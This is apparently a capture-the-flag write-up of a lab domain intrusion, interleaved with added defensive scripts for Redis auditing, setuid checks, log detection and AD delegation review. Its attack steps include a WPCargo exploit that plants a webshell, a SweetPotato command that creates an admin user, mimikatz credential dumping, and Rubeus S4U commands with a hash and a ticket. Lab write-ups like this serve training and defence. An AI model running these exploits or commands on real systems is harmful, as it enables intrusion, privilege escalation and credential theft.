Brute4Road (春秋云镜 range)

First of all, thanks to sun 😋😋😋. References: https://sun1028.top/ and https://xz.aliyun.com/news/13105

We get the target IP. What to do with it? Run fscan straight away.
flag-01
Redis unauthenticated access is found.

Tool: https://github.com/n0b0dyCN/redis-rogue-server/blob/master/

Use the tool's command to pop a reverse shell.

The shell comes back successfully; next, privilege escalation.
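The whole flag-01 entry point is a Redis instance reachable without a password. As an added example (not part of the writeup or the rogue-server tool), here is a small redis.conf audit that flags the settings which make the unauthenticated-access plus MODULE LOAD chain possible; the checks and the two sample configs are constructed for this example.

```python
# Added example (not from the writeup): audit a redis.conf for the settings
# that allow unauthenticated access and rogue-server style MODULE LOAD abuse.
DANGEROUS_COMMANDS = {"MODULE", "SLAVEOF", "REPLICAOF", "CONFIG", "DEBUG"}

def parse_redis_conf(text: str) -> dict:
    """Return directives as {name: [[values...], ...]}; comments and blank lines skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit_redis_conf(text: str) -> list:
    """Return a list of findings (strings); an empty list means nothing was flagged."""
    conf = parse_redis_conf(text)
    findings = []
    # Without a restrictive bind, Redis listens on every interface.
    binds = [v for vals in conf.get("bind", []) for v in vals]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: listening on all interfaces")
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if not pm or pm[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if "requirepass" not in conf:
        findings.append("requirepass: no password set (unauthenticated access)")
    # rename-command X "" disables X; anything left enabled keeps the rogue-server path open.
    disabled = {vals[0].upper() for vals in conf.get("rename-command", [])
                if len(vals) >= 2 and vals[1].strip('"') == ""}
    for cmd in sorted(DANGEROUS_COMMANDS - disabled):
        findings.append(f"rename-command: {cmd} still enabled")
    return findings

# Constructed sample configs for this example.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = """bind 127.0.0.1
protected-mode yes
requirepass <strong-random-password>
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
rename-command DEBUG ""
"""
```

Running the Redis process as a non-root user, as the `redis@` prompt in the next block shows, is the other half of limiting what a rogue-server module can do.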
```
[redis@centos-web01 db]$ find / -perm -4000 -print 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
[redis@centos-web01 db]$
```

Note the setuid `base64`. Because it runs as root, it can read files the `redis` user cannot; decoding its output recovers the flag.

```
[redis@centos-web01 db]$ base64 "/home/redis/flag/flag01" | base64 -d
[ASCII-art banner]
flag01: flag{97db100b-d78e-4829-ad87-b1444166146c}
Congratulations! ! ! Guess where is the second flag?
[redis@centos-web01 db]$
```
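The setuid `base64` is the only entry in that listing that does not belong there. As an added example (not from the writeup), this script compares `find / -perm -4000` output against a baseline and flags anything extra, with a second function that walks the filesystem directly; the BASELINE set is constructed for this example and in practice should come from the package manager.

```python
# Added example (not from the writeup): flag setuid binaries outside the
# distribution's expected set. BASELINE is a constructed allowlist for this
# example; derive it from the package manager (e.g. rpm -V) on a real host.
import os
import stat

BASELINE = {
    "/usr/sbin/pam_timestamp_check", "/usr/sbin/usernetctl", "/usr/sbin/unix_chkpwd",
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/passwd",
    "/usr/bin/chage", "/usr/bin/umount", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/sudo", "/usr/bin/crontab", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/pkexec", "/usr/libexec/dbus-1/dbus-daemon-launch-helper",
    "/usr/lib/polkit-1/polkit-agent-helper-1",
}

# Generic file tools that read or write arbitrary files when setuid root
# (base64 is the one used above to read flag01).
FILE_TOOLS = {"base64", "cat", "cp", "tar", "xxd", "less", "more", "vim", "python"}

def audit_suid(find_output: str, baseline=BASELINE) -> list:
    """Given `find / -perm -4000 -print` output, return (path, reason) pairs to review."""
    findings = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path.startswith("/"):
            continue  # skip shell prompts and other noise
        if path in baseline:
            continue
        reason = "not in baseline"
        if path.rsplit("/", 1)[-1] in FILE_TOOLS:
            reason += "; generic file tool setuid root can read any file"
        findings.append((path, reason))
    return findings

def find_suid(root="/"):
    """Yield regular files with the setuid bit set under root (live equivalent of the find command)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path

# Constructed sample reproducing the listing from the writeup, prompts included.
SAMPLE_FIND_OUTPUT = (
    "[redis@centos-web01 db]$ find / -perm -4000 -print 2>/dev/null\n"
    + "\n".join(sorted(BASELINE | {"/usr/bin/base64"}))
    + "\n[redis@centos-web01 db]$\n"
)
```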
flag-02

Upload fscan and a tunnelling tool.

```
./fscan -h 172.22.2.7/24
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.34    is alive
(icmp) Target 172.22.2.7     is alive
(icmp) Target 172.22.2.3     is alive
(icmp) Target 172.22.2.18    is alive
(icmp) Target 172.22.2.16    is alive
[*] Icmp alive hosts len is: 5
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.3:88 open
172.22.2.34:139 open
172.22.2.16:135 open
172.22.2.34:135 open
172.22.2.3:135 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.18:22 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:445 open
172.22.2.34:445 open
172.22.2.16:139 open
172.22.2.18:139 open
172.22.2.3:139 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo
[*] 172.22.2.3
   [->] DC
   [->] 172.22.2.3
[*] NetInfo
[*] 172.22.2.16
   [->] MSSQLSERVER
   [->] 172.22.2.16
[*] WebTitle http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo
[*] 172.22.2.34
   [->] CLIENT01
   [->] 172.22.2.34
[*] NetBios 172.22.2.34 XIAORANG\CLIENT01
[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[*] OsInfo 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] ftp 172.22.2.7:21:anonymous
   [->] pub
[*] WebTitle http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
已完成 20/20
[*] 扫描结束,耗时: 15.83239473s
```

Hosts found:

```
172.22.2.7    current machine
172.22.2.34   XIAORANG\CLIENT01
172.22.2.3    DC:DC.xiaorang.lab
172.22.2.16   MSSQLSERVER.xiaorang.lab
172.22.2.18   WORKGROUP\UBUNTU-WEB02
```
With the fscan information gathering done, set up the proxy tool.

The internal hosts are reachable through it.

From Kali:

```
proxychains wpscan --url http://172.22.2.18/
```

One of the WordPress plugins has a vulnerability:

https://github.com/biulove0x/CVE-2021-25003
```python
import binascii
import requests
import sys

payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]
destination_url = 'http://172.22.2.18/'
cmd = 'ls'
requests.get(f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php")
print(requests.post(f"{destination_url}webshell.php?1=system", data={"2": cmd}).content.decode('ascii', 'ignore'))
```
After connecting, the flag is nowhere in the web root, so look in the database.

Got it.
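The exploit above leaves a distinctive trace: one request to the WPCargo `barcode.php` with a `filepath` ending in `.php`, followed by requests to the file it wrote. As an added example (not from the writeup), the following detection runs over constructed Apache-style access-log lines; the log format, the `DOCROOT` value and the sample lines are assumptions for this example.

```python
# Added example (not from the writeup): detect CVE-2021-25003 style abuse of
# wpcargo/includes/barcode.php in web access logs and the follow-up hits on
# the file it was told to write. DOCROOT is an assumption for this example.
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
BARCODE = "/wp-content/plugins/wpcargo/includes/barcode.php"
DOCROOT = "/var/www/html"
SCRIPT_EXT = (".php", ".phtml", ".phar")

def detect_wpcargo_abuse(log_text: str) -> list:
    """Return (client_ip, message) alerts; written tracks web paths barcode.php was asked to create."""
    alerts, written = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.endswith(BARCODE):
            fp = parse_qs(url.query).get("filepath", [""])[0]
            if fp.lower().endswith(SCRIPT_EXT) or "/.." in fp:
                alerts.append((m["ip"], "barcode.php asked to write script file " + fp))
                if fp.startswith(DOCROOT):
                    written.add(fp[len(DOCROOT):])
        elif url.path in written:
            alerts.append((m["ip"], f"{m['method']} to file dropped via barcode.php: {url.path}"))
    return alerts

# Constructed sample log: the exploit pair from one client, then a benign barcode request.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2026:17:01:02 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=xx0x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [12/Feb/2026:17:01:03 +0800] "POST /webshell.php?1=system HTTP/1.1" 200 88 "-" "python-requests/2.31"
198.51.100.9 - - [12/Feb/2026:17:02:10 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=123&size=1 HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
"""
```

Updating the plugin closes the write primitive; the log rule is still worth keeping to spot attempts against stragglers.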
flag-03
```
fscan -h 172.22.2.16 -m mssql -pwdf pwd.txt
```

Potato privilege escalation

Connect with MDUT and escalate with SweetPotato: enable OLE, then upload SweetPotato.exe.

```
C:/Users/Public/SweetPotato.exe -a "net user lanyangyang qwer1234! /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators lanyangyang /add"
```
flag-04

Gather some Windows information.

```
C:\Users\lanyangyang>systeminfo

主机名:           MSSQLSERVER
OS 名称:          Microsoft Windows Server 2016 Datacenter
OS 版本:          10.0.14393 暂缺 Build 14393
OS 制造商:        Microsoft Corporation
OS 配置:          成员服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:
注册的组织:       Aliyun
产品 ID:          00376-40000-00000-AA947
初始安装日期:     2022/6/8, 16:30:01
系统启动时间:     2026/2/12, 16:55:32
系统制造商:       Alibaba Cloud
系统型号:         Alibaba Cloud ECS
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz
BIOS 版本:        SeaBIOS 449e491, 2014/4/1
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     3,950 MB
可用的物理内存:   1,409 MB
虚拟内存: 最大值: 4,654 MB
虚拟内存: 可用:   1,018 MB
虚拟内存: 使用中: 3,636 MB
页面文件位置:     C:\pagefile.sys
域:               xiaorang.lab
登录服务器:       \\MSSQLSERVER
修补程序:         安装了 6 个修补程序。
                  [01]: KB5013625
                  [02]: KB4049065
                  [03]: KB4486129
                  [04]: KB4486131
                  [05]: KB5014026
                  [06]: KB5013952
网卡:             安装了 1 个 NIC。
                  [01]: Red Hat VirtIO Ethernet Adapter
                      连接名:      以太网
                      启用 DHCP:   是
                      DHCP 服务器: 172.22.255.253
                      IP 地址
                        [01]: 172.22.2.16
                        [02]: fe80::444e:2b2b:eb24:e70a
Hyper-V 要求:     已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。
```
Look at the domain attack-path diagram.

MSSQLSERVER is configured with constrained delegation to the DC's LDAP and CIFS services. Upload mimikatz.exe ("kiwi") and run it as administrator.
```
privilege::debug           # elevate privileges
sekurlsa::logonpasswords   # extract logon credentials
```

Constrained delegation attack

MSSQLSERVER is configured with constrained delegation to the DC's LDAP and CIFS services: use Rubeus to request a ticket for its own account, then forge a service ticket (ST) through S4U.

First, request the ticket for the machine account with Rubeus.exe (you have to compile this tool yourself):
```
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:4250ef4c15bfeb685371970e1be00b85 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
```

This returns the ticket.

Inject the ticket:
```
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+ gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+ gAwIBEqEDAgECooIEUQSCBE1btfneTGYuYI+ fnwsBbpz9d80968QVyp/krgzq88XpZdXIydeuCa0Ox+Y2XeHdywDbZ8TEC2/ PPQ7XTj4xkQ5Se /iY6tlhKKUozG8T0y0+6E1YQzAlDsB0qCPdg5V4sptRaK/ mD+ K8x3lr6IOUAZLPdngf4yW + zPleZWKLoVpWiDE9GNh+ 1h6XLacLFanztFoaB/yTetP2GuqJ0U2edNPwYVgn+K3y4klqfjQnpAxA61vQrgQSD2Rcl4JqRSVFUary3JKF+Pf7IMXApZGz25NqmPyTMkfBXlLFDr/ DuQzh + 3Fd2yxCtvw6MOzZwREQ9SKQVFGg8VesAOkVXQd9twFD7mU8wWYnryqHjJUc+ B /VD/ MCl2mYbpm7UdVHOLtIY52dP613S7bnol7R8E + MvmFbsRsRFQbl7OCzTPtYdDXMMXWtQydVIgmaVQk1EQlQ4KYCpLpaYrTzvtg841iO66Zt2zM97K0mpGVQBX + KRun8 + 0QIsdynifLvMtFnFE+ MkjePEhvGAa6YkZhH0XlNtRUA4caXBg + KNr0 /Cgr/ h9xOcDXIJA40+ E5XS0 /NjOKNHKIlZs3Nf9g0D5CI5vEncQisucBDp0fmVVylY1oMFzwhStWRszTwtQ+tax1GMjmM8UewFxLcxmhn6nBVQMkLkJ5vaQbSz+8Ko9ldCpEV3ShDi/ w02lMGxJFfwQeTqWquFlhFuR506yOHlX6sQPIq7Q2R4LNLoDcHRFr+ xs826u7Xa/cKLtCrSQor2bLQs7nWVuVJRsCx5m2UKalffwWxowhSoPEnoNyI+GM7t59LI7qud+Q8bfb9VH+/ 2QpHzuY2SOlojbi4jl8gwoxvdMTUAZuJZBWsRZHwELmIMSJ6rcYbri5cdYHGpYVR6gA0UyhDtZrL5AUSHIg8xEwBoHxaI70OTi1RZl/q+F1rMdW+7tbrd+JGHSlx917zEbepDn95m0OyqFNhwOUU59HU57VuAN7HCAlG1RqMHaXC2KihJNjlu2TU3zjhi08lAE3k3J+91FXAWE/ AkCaMj1R2yH5OmhQQWLOTm8RMsphOSqupoiwTs4Gmmg6WPZHMBabGwUCdzsFkLeHHCrONIosnn7ifo8u /o+cSKCo1R+zKK4eD1dvudnsfdShHzNEFgkhVahkKwRzZMnzQ77pL5hHOSUg/ 5GEv10eXvi+ ktWq9AhYIBJ/6FP1P9GarT+6sM3X/ Vpdy1GeRVBrMYRVJ20iZ5 /RqkLb2oEvBaa74gPsD9DntAff3R/ MgAt7130GeixmR5giywd + SrGjsweO + uR8iiRR9cxe6/TirkN4BdQMder7dYavEc8q0X7drdebDB4XgG9sY9+YkSsudo2pZHnHKEykga6iqoAS66BoxObyGtfn2QamjUARvD8n4bJGUTC8ed1yclN7P8M9Zgth77CpuVVYpnuR7+cNoPBSwALDQ55PMLa9gQoC83vzKbVvSr5dE/ fqjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAIogDroed1KhPlRRifj/
AboQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDIxMzE2MjQ1MlqmERgPMjAyNDAyMTQwMjI0NTJapxEYDzIwMjQwMjIwMTYyNDUyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
```
Read the flag:

```
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
```
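What makes this last hop possible is a machine account that may delegate to CIFS and LDAP on the domain controller, combined with a privileged user that is not protected from delegation. As an added example (not from the writeup), here is an audit over records exported from AD; the records are constructed to mirror the MSSQLSERVER$ finding, the DC list is an assumption, and whether protocol transition is actually set on this range is not stated in the writeup, so the sample value is assumed.

```python
# Added example (not from the writeup): review delegation settings exported
# from AD (e.g. via an LDAP query for msDS-AllowedToDelegateTo). The records
# below are constructed; DOMAIN_CONTROLLERS is an assumption for this example.
TRUSTED_FOR_DELEGATION = 0x80000              # userAccountControl: unconstrained delegation
NOT_DELEGATED = 0x100000                      # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # constrained delegation with protocol transition

DOMAIN_CONTROLLERS = {"dc.xiaorang.lab"}      # lower-case DNS names of the DCs

def audit_delegation(records: list, dcs=DOMAIN_CONTROLLERS) -> dict:
    """Map sAMAccountName -> list of reasons it needs review; empty dict means nothing flagged."""
    report = {}
    for r in records:
        reasons = []
        uac = r.get("userAccountControl", 0)
        targets = [t.lower() for t in r.get("msDS-AllowedToDelegateTo", [])]
        if uac & TRUSTED_FOR_DELEGATION:
            reasons.append("unconstrained delegation enabled")
        for spn in targets:
            svc, _, host = spn.partition("/")
            host = host.split(":")[0]
            if host in dcs:
                reasons.append(f"may delegate {svc} to a domain controller ({host})")
        if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            reasons.append("protocol transition set: S4U2Self can impersonate any "
                           "non-sensitive user to the targets above")
        # Privileged users should carry NOT_DELEGATED (or sit in Protected Users),
        # otherwise a delegating host can impersonate them as shown above.
        if r.get("adminCount") == 1 and not uac & NOT_DELEGATED:
            reasons.append("privileged account not marked 'sensitive, cannot be delegated'")
        if reasons:
            report[r["sAMAccountName"]] = reasons
    return report

# Constructed sample records mirroring the range (0x1000 = WORKSTATION_TRUST_ACCOUNT,
# 0x200 = NORMAL_ACCOUNT; the protocol-transition bit on MSSQLSERVER$ is assumed).
SAMPLE_RECORDS = [
    {"sAMAccountName": "MSSQLSERVER$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/DC.xiaorang.lab", "ldap/DC.xiaorang.lab"]},
    {"sAMAccountName": "CLIENT01$", "userAccountControl": 0x1000},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "adminCount": 1},
]
```

Removing the delegation entries to the DC (or at least the LDAP one) and marking Domain Admins as sensitive both break the chain the writeup walks through.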
Flag captured (well, not really: I never compiled the tool, so all the flag-04 screenshots are borrowed, hahaha).